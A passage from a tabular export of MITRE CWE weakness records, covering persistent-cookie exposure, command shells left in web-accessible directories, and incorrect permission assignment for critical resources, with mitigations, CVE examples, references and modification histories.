"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Taxonomy_Mappings",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2011-03-29",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Information Leak Through Persistent Cookies",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2020-02-24",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Information Exposure Through Persistent Cookies",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "552",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] | null | null | null | null | null | 2
|
[
[
"664",
"668",
"552",
"539"
],
[
"284",
"285",
"552",
"539"
]
] |
[] |
553
|
Command Shell in Externally Accessible Directory
|
Variant
|
Simple
|
Incomplete
|
A possible shell file exists in /cgi-bin/ or other accessible directories. This is extremely dangerous and can be used by an attacker to execute commands on the web server.
| null | null | null |
[
{
"Note": null,
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Execute Unauthorized Code or Commands"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Availability"
]
}
] |
[
{
"Description": "Remove any Shells accessible under the web root folder and children directories.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Installation",
"System Configuration"
],
"Strategy": null
}
] | null | null | null |
[
"650"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "Anonymous Tool Vendor (under NDA)",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Taxonomy_Mappings",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2019-01-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-04-11",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Possible Command Shell (csh)",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "552",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 2
|
[
[
"664",
"668",
"552",
"553"
],
[
"284",
"285",
"552",
"553"
]
] |
[] |
732
|
Incorrect Permission Assignment for Critical Resource
|
Class
|
Simple
|
Draft
|
The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors.
|
When a resource is given a permission setting that provides access to a wider range of actors than required, it could lead to the exposure of sensitive information, or the modification of that resource by unintended parties. This is especially dangerous when the resource is related to program configuration, execution, or sensitive user data. For example, consider a misconfigured storage account for the cloud that can be read or written by a public or anonymous user.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": "Cloud Computing",
"Name": null,
"Prevalence": "Often",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": "\n\nREALIZATION: This weakness is caused during implementation of an architectural security tactic.\n\n\nThe developer might make certain assumptions about the environment in which the product operates - e.g., that the software is running on a single-user system, or the software is only accessible to trusted administrators. When the software is running in a different environment, the permissions become a problem.\n",
"Phase": "Implementation"
},
{
"Note": "The developer may set loose permissions in order to minimize problems when the user first runs the program, then create documentation stating that permissions should be tightened. Since system administrators and users do not always read the documentation, this can result in insecure permissions being left unchanged.",
"Phase": "Installation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Read Files or Directories"
],
"Likelihood": null,
"Note": "An attacker may be able to read sensitive information from the associated resource, such as credentials or configuration information stored in a file.",
"Scope": [
"Confidentiality"
]
},
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": "An attacker may be able to modify critical properties of the associated resource to gain privileges, such as replacing a world-writable executable with a Trojan horse.",
"Scope": [
"Access Control"
]
},
{
"Impact": [
"Modify Application Data",
"Other"
],
"Likelihood": null,
"Note": "An attacker may be able to destroy or corrupt critical data in the associated resource, such as deletion of records from a database.",
"Scope": [
"Integrity",
"Other"
]
}
] |
[
{
"Description": "When using a critical resource such as a configuration file, check to see if the resource has insecure permissions (such as being modifiable by any regular user) [REF-62], and generate an error or even exit the software if there is a possibility that the resource could have been modified by an unauthorized party.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
},
{
"Description": "Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully defining distinct user groups, privileges, and/or roles. Map these against data, functionality, and the related resources. Then set the permissions accordingly. This will allow you to maintain more fine-grained control over your resources. [REF-207]",
"Effectiveness": "Moderate",
"EffectivenessNotes": "This can be an effective strategy. However, in practice, it may be difficult or time consuming to define these areas when there are many different resources or user types, or if the applications features change rapidly.",
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "\n\nRun the code in a \"jail\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.\n\n\nOS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.\n\n\nThis may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.\n\n\nBe careful to avoid CWE-243 and other weaknesses related to jails.\n",
"Effectiveness": "Limited",
"EffectivenessNotes": "The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.",
"MitigationID": "MIT-22",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": "Sandbox or Jail"
},
{
"Description": "During program startup, explicitly set the default permissions or umask to the most restrictive setting possible. Also set the appropriate permissions during program installation. This will prevent you from inheriting insecure permissions from any user who installs or runs the program.",
"Effectiveness": "High",
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation",
"Installation"
],
"Strategy": null
},
{
"Description": "For all configuration files, executables, and libraries, make sure that they are only readable and writable by the software's administrator.",
"Effectiveness": "High",
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"System Configuration"
],
"Strategy": null
},
{
"Description": "Do not suggest insecure configuration changes in documentation, especially if those configurations can extend to resources and other programs that are outside the scope of the application.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Documentation"
],
"Strategy": null
},
{
"Description": "Do not assume that a system administrator will manually change the configuration to the settings that are recommended in the software's manual.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Installation"
],
"Strategy": null
},
{
"Description": "Ensure that the software runs properly under the United States Government Configuration Baseline (USGCB) [REF-199] or an equivalent hardening configuration guide, which many organizations use to limit the attack surface and potential risk of deployed software.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-37",
"Phase": [
"Operation",
"System Configuration"
],
"Strategy": "Environment Hardening"
},
{
"Description": "When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to disable public access.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation",
"System Configuration",
"Operation"
],
"Strategy": null
}
] |
[
{
"Description": "Go application for cloud management creates a world-writable sudoers file that allows local attackers to inject sudo rules and escalate privileges to root by winning a race condition.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-29527",
"Reference": "CVE-2022-29527"
},
{
"Description": "Anti-virus product sets insecure \"Everyone: Full Control\" permissions for files under the \"Program Files\" folder, allowing attackers to replace executables with Trojan horses.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3482",
"Reference": "CVE-2009-3482"
},
{
"Description": "Product creates directories with 0777 permissions at installation, allowing users to gain privileges and access a socket used for authentication.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3897",
"Reference": "CVE-2009-3897"
},
{
"Description": "Photo editor installs a service with an insecure security descriptor, allowing users to stop or start the service, or execute commands as SYSTEM.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3489",
"Reference": "CVE-2009-3489"
},
{
"Description": "socket created with insecure permissions",
"Link": "https://www.cve.org/CVERecord?id=CVE-2020-15708",
"Reference": "CVE-2020-15708"
},
{
"Description": "Library function copies a file to a new target and uses the source file's permissions for the target, which is incorrect when the source file is a symbolic link, which typically has 0777 permissions.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3289",
"Reference": "CVE-2009-3289"
},
{
"Description": "Device driver uses world-writable permissions for a socket file, allowing attackers to inject arbitrary commands.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-0115",
"Reference": "CVE-2009-0115"
},
{
"Description": "LDAP server stores a cleartext password in a world-readable file.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-1073",
"Reference": "CVE-2009-1073"
},
{
"Description": "Terminal emulator creates TTY devices with world-writable permissions, allowing an attacker to write to the terminals of other users.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-0141",
"Reference": "CVE-2009-0141"
},
{
"Description": "VPN product stores user credentials in a registry key with \"Everyone: Full Control\" permissions, allowing attackers to steal the credentials.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-0662",
"Reference": "CVE-2008-0662"
},
{
"Description": "Driver installs its device interface with \"Everyone: Write\" permissions.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-0322",
"Reference": "CVE-2008-0322"
},
{
"Description": "Driver installs a file with world-writable permissions.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3939",
"Reference": "CVE-2009-3939"
},
{
"Description": "Product changes permissions to 0777 before deleting a backup; the permissions stay insecure for subsequent backups.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3611",
"Reference": "CVE-2009-3611"
},
{
"Description": "Product creates a share with \"Everyone: Full Control\" permissions, allowing arbitrary program execution.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-6033",
"Reference": "CVE-2007-6033"
},
{
"Description": "Product uses \"Everyone: Full Control\" permissions for memory-mapped files (shared memory) in inter-process communication, allowing attackers to tamper with a session.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-5544",
"Reference": "CVE-2007-5544"
},
{
"Description": "Database product uses read/write permissions for everyone for its shared memory, allowing theft of credentials.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-4868",
"Reference": "CVE-2005-4868"
},
{
"Description": "Security product uses \"Everyone: Full Control\" permissions for its configuration files.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2004-1714",
"Reference": "CVE-2004-1714"
},
{
"Description": "\"Everyone: Full Control\" permissions assigned to a mutex allows users to disable network connectivity.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-0006",
"Reference": "CVE-2001-0006"
},
{
"Description": "Chain: database product contains buffer overflow that is only reachable through a .ini configuration file - which has \"Everyone: Full Control\" permissions.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-0969",
"Reference": "CVE-2002-0969"
}
] | null |
[
{
"EntryID": "FIO03-J",
"EntryName": "Create files with appropriate access permission",
"MappingFit": null,
"TaxonomyName": "The CERT Oracle Secure Coding Standard for Java (2011)"
},
{
"EntryID": "SEC01-J",
"EntryName": "Do not allow tainted variables in privileged blocks",
"MappingFit": null,
"TaxonomyName": "The CERT Oracle Secure Coding Standard for Java (2011)"
},
{
"EntryID": "ENV03-J",
"EntryName": "Do not grant dangerous combinations of permissions",
"MappingFit": null,
"TaxonomyName": "The CERT Oracle Secure Coding Standard for Java (2011)"
},
{
"EntryID": "FIO06-C",
"EntryName": "Create files with appropriate access permissions",
"MappingFit": null,
"TaxonomyName": "CERT C Secure Coding"
}
] |
[
"1",
"122",
"127",
"17",
"180",
"206",
"234",
"60",
"61",
"62",
"642"
] |
[
{
"Authors": [
"Mark Dowd",
"John McDonald",
"Justin Schuh"
],
"Edition": "1st Edition",
"ExternalReferenceID": "REF-62",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2006",
"Publisher": "Addison Wesley",
"Section": "Chapter 9, \"File Permissions.\" Page 495",
"Title": "The Art of Software Security Assessment",
"URL": null,
"URLDate": null
},
{
"Authors": [
"John Viega",
"Gary McGraw"
],
"Edition": "1st Edition",
"ExternalReferenceID": "REF-207",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2002",
"Publisher": "Addison-Wesley",
"Section": "Chapter 8, \"Access Control.\" Page 194",
"Title": "Building Secure Software: How to Avoid Security Problems the Right Way",
"URL": null,
"URLDate": null
},
{
"Authors": [
"Jason Lam"
],
"Edition": null,
"ExternalReferenceID": "REF-594",
"Publication": null,
"PublicationDay": "24",
"PublicationMonth": "03",
"PublicationYear": "2010",
"Publisher": "SANS Software Security Institute",
"Section": null,
"Title": "Top 25 Series - Rank 21 - Incorrect Permission Assignment for Critical Response",
"URL": "http://software-security.sans.org/blog/2010/03/24/top-25-series-rank-21-incorrect-permission-assignment-for-critical-response",
"URLDate": null
},
{
"Authors": [
"NIST"
],
"Edition": null,
"ExternalReferenceID": "REF-199",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "United States Government Configuration Baseline (USGCB)",
"URL": "https://csrc.nist.gov/Projects/United-States-Government-Configuration-Baseline",
"URLDate": "2023-03-28"
},
{
"Authors": [
"MITRE"
],
"Edition": null,
"ExternalReferenceID": "REF-1287",
"Publication": null,
"PublicationDay": "28",
"PublicationMonth": "06",
"PublicationYear": "2022",
"Publisher": null,
"Section": "Details of Problematic Mappings",
"Title": "Supplemental Details - 2022 CWE Top 25",
"URL": "https://cwe.mitre.org/top25/archive/2022/2022_cwe_top25_supplemental.html#problematicMappingDetails",
"URLDate": "2024-11-17"
},
{
"Authors": [
"Center for Internet Security"
],
"Edition": null,
"ExternalReferenceID": "REF-1307",
"Publication": null,
"PublicationDay": "16",
"PublicationMonth": "08",
"PublicationYear": "2022",
"Publisher": null,
"Section": "Section 3.7",
"Title": "CIS Microsoft Azure Foundations Benchmark version 1.5.0",
"URL": "https://www.cisecurity.org/benchmark/azure",
"URLDate": "2023-01-19"
},
{
"Authors": [
"Center for Internet Security"
],
"Edition": null,
"ExternalReferenceID": "REF-1327",
"Publication": null,
"PublicationDay": "31",
"PublicationMonth": "03",
"PublicationYear": "2022",
"Publisher": null,
"Section": "Section 5.1",
"Title": "CIS Google Cloud Computing Platform Benchmark version 1.3.0",
"URL": "https://www.cisecurity.org/benchmark/google_cloud_computing_platform",
"URLDate": "2023-04-24"
}
] |
[
{
"Note": "The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693).",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": "new weakness-focused entry for Research view.",
"SubmissionDate": "2008-09-08",
"SubmissionName": "CWE Content Team",
"SubmissionOrganization": "MITRE",
"SubmissionReleaseDate": "2008-09-09",
"SubmissionVersion": "1.0",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Likelihood_of_Exploit, Name, Potential_Mitigations, Relationships",
"ModificationDate": "2009-01-12",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, Related_Attack_Patterns",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Name",
"ModificationDate": "2009-05-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
